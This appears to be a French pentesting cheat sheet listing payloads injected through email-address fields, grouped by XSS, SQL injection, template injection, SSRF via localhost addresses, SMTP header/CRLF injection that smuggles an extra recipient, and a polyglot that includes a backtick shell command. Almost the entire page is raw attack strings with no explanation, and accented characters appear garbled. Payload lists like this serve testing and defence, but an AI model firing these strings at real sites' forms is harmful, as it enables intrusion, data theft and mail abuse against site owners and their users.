๐Injections dans emails
XSS
test+(<script>alert(document.domain)</script>)@mail.xyz
test@mail(<script>alert(document.domain)</script>).xyz
"<script>alert(document.domain)</script>"@mail.xyz
"hello<form/><!><details/open/ontoggle=alert(1)>"@mail.xyz
["');alert('XSS');//"]@mail.xyz
SQLi
"'OR 1=1--'"@mail.xyz
SSTI
"<%=7*7 %>"@mail.xyz
test+(${{7*7}})@mail.xyz
test+${{7*7}}@mail.xyz
SSRF
[email protected]
test@[127.0.0.1]
Header injection
"%0D%0AContent-Length:%200%0D%0A%OD%0A"@mail.xyz
"[email protected]>\r\nRCPT TO:<victim+"@mail.xyz
Autres
<[email protected]>[email protected]
username+${7*7}{{7*7}}`id`|'or''='mail.xyz
Derniรจre mise ร jour
Cet article vous a-t-il รฉtรฉ utile ?